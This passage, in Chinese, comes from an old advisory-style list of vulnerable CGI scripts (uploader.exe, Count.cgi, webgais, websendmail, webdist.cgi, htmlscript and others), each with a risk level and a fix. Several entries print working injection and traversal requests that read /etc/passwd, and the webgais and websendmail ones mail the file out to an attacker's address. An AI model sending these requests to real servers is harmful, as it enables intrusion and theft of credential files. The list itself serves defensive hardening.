7. uploader.exe
● 类型: 攻击型
● 风险等级: 中
● 描述: 如果使用Windows NT作为WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
● 解决方法: 将uploader.exe从Web目录移走或删除。
8. bdir.htr
● 类型: 攻击型
● 风险等级: 高
● 描述: 如果使用Windows NT做为WebServer的操作系统,而且bdir.htr存在于Web可执行目录中的话,入侵者将能利用它在服务器上无止境的创建ODBC数据库,并生成一些可执行的文件。
● 解决方法: 将bdir.htr从Web目录移走或删除。
9. Count.cgi
● 类型: 攻击型
● 风险等级: 高
● 描述: 在/cgi-bin目录下的Count.cgi程序(Wwwcount2.3版本)有一个溢出错误,允许入侵者无须登录而远程执行任何指令。
● 建议: 如无必要可以删除该文件。
● 解决方法: 将Wwwcount升级到2.4或者以上。
10. test-cgi
● 类型: 攻击型
● 风险等级: 高
● 描述: test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息。
● 建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。
● 解决方法: 删除test-cgi文件。
11. nph-test-cgi
● 类型: 攻击型
● 风险等级: 高
● 描述: nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息。
● 建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。
● 解决方法: 删除nph-test-cgi文件。
12. php.cgi
● 类型: 攻击型
● 风险等级: 低
● 描述: php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者读取的漏洞。
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除php.cgi程序是最好的办法。
13. handler
● 类型: 攻击型
● 风险等级: 低
● 描述: IRIX 5.3、6.2、6.3、6.4的/cgi-bin/handler程序存在缓存溢出错误,允许入侵者在server上远程执行如下程序:
telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除handler文件。
14. webgais
● 类型: 攻击型
● 风险等级: 高
● 描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个漏洞使入侵者可以绕过程序的安全机制,执行系统命令:
POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the "exploit" line) telnet target.machine.com 80 query="mail+you\@your.host</etc/passwd;echo"&output=subject&domain=paragraph
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除webgais文件。
15. websendmail
● 类型: 攻击型
● 风险等级: 高
● 描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:
telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the stri ng passed to the server, in this case xxx=90) receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a &subject=a &content=a
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 高级用户可以编辑websendmail脚本,过滤特殊字符。一般用户则删除websendmail文件。
16. webdist.cgi
● 类型:攻击型
● 风险等级:高
● 描述:对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi。
17. faxsurvey
● 类型: 攻击型
● 风险等级: 高
● 描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除/cgi-bin/faxsurvey文件。
18. htmlscript
● 类型: 攻击型
● 风险等级: 中
● 描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个漏洞使入侵者可以查看服务器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到3.0以上。
19. pfdisplay
● 类型: 攻击型
● 风险等级: 中
● 描述: 在Irix6.4或者更早版本的Web服务器上,/cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件。
● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
● 解决方法: 删除/cgi-bin/pfdisplay文件,或者打补丁程序。
补丁程序可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下载:
Filename: README.patch.3018 Algorithm #1 (sum -r): 37955 11 README.patch.3018 Algorithm #2 (sum): 15455 11 README.patch.3018 MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69 Filename: patchSG0003018 Algo